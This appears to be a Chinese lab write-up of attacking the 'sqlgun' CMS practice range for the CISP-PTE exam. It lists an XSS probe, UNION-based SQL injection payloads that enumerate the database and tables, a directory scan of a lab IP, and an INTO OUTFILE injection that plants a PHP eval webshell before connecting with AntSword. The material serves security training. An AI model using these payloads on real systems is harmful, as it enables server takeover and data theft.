CISP-PTE CMS sqlgun靶场渗透测试

1.打开靶场

2.在搜索框尝试xss

<script>alert(1)</script>

发现此处存在xss漏洞

3.在搜索框尝试sql注入

-1' union select 1,2,3# 发现页面有回显

4.查询数据库名

-1' union select 1,database(),3#

5.查询数据库的所有表

-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'),3#

6.扫描敏感目录

dirb http://124.221.58.83:8081

7.访问phpinfo

可以看见网站的绝对路径

8.通过sql注入写入一句话木马

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/1.php' #

9.访问写入的php文件

10.使用蚁剑进行连接

相关推荐
海尔辛4 小时前
学习黑客5 分钟读懂Linux Permissions 101
linux·学习·安全
zizisuo4 小时前
面试篇:Spring Security
网络·数据库·安全
玉笥寻珍5 小时前
Web安全渗透测试基础知识之HTTP参数污染篇
网络·网络协议·安全·web安全·http
小白学安全hhhh5 小时前
OFCMS代码审计-freemaker注入&sql注入&xxe&xss&文件上传
web安全
玉笥寻珍6 小时前
Web安全渗测试基础知识之SSL交互异常利用篇
网络协议·安全·web安全·网络安全·交互·ssl
7yewh6 小时前
MCU程序加密保护(二)ID 验证法 加密与解密
单片机·嵌入式硬件·安全
不会代码的小徐6 小时前
容器安全-核心概述
安全·网络安全·云计算
彬彬醤8 小时前
查询电脑伪装IP,网络安全速查攻略!
网络·网络协议·tcp/ip·安全·web安全·http·https
Python私教9 小时前
Rust:重新定义系统编程的安全与效率边界
开发语言·安全·rust
iSee85711 小时前
DocsGPT 远程命令执行漏洞复现(CVE-2025-0868)
安全·web安全